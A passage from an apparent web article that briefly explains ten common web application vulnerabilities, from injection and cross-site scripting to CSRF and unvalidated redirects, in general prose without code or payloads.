In practice using SQL, OS, and LDAP, injection is a very risky thing to happen. Injection is usually performed by entering untrusted data into the interpreter as part of a command or query. The data entered by the injector can run an interpreter to execute certain commands or access confidential data without permission.
2. Broken Authentication and Session Management
Functions in web-based applications related to authentication and session management are often poorly implemented. If this happens at a severe level, system attackers will easily steal and exploit passwords and other personal data that will harm the user.
3. Cross-Site Scripting (XSS)
Weaknesses in XSS occur when an application accesses untrusted data and sends it via the web without proper validation confirmation. XSS events will allow system attackers to use scripts from the browser to access the web without permission. For example, redirecting to fake websites or even redirecting to dangerous sites.
4. Insecure Direct Object References
The immediate object here deals with when the developer exposes a reference to the internal object implementation. For example to files, directories, or database keys. Without having access control checks and other protections, attackers can manipulate these references to access confidential data.
5. Security Misconfiguration
So far, a good security system requires a guaranteed configuration to access applications, frameworks, web servers, server applications, database servers, and platforms. Because, the default settings are often insecure. In addition, regular updates to the software are also a must.
6. Sensitive Data Exposure
Many web-based applications do not properly protect sensitive data. For example, credit card data to authentication data. It is very possible for system attackers to steal or modify data with weak security systems to commit acts of fraud, identity theft, or other crimes.
7. Missing Function Level Access Control
The majority of web-based applications will verify access functions before making them available in the user interface. In fact, applications also need to exercise the same access control to the server each time that function is executed. If the request is not verified, then attackers can easily access private functions without permission.
8. Cross-Site Request Forgery (CSRF)
The way CSRF works is by forcing into the user’s browser which then sends an HTTP request, including cookies, as well as various confidential information stored on the browser, to a fake web application. This will make the user seem to access the application directly, even though they are not.
9. Using Known Vulnerable Components
Basic components such as databases, frameworks, and various software modules run mostly in full rights. Exploiting risky components can result in data loss and server takeover.
10. Unvalidated Redirects and Forwards
Web-based applications that are used by users often redirect and forward to other pages or even other websites. Such actions, without proper validation, can redirect users to phishing pages, malware, or use them to access other malicious pages.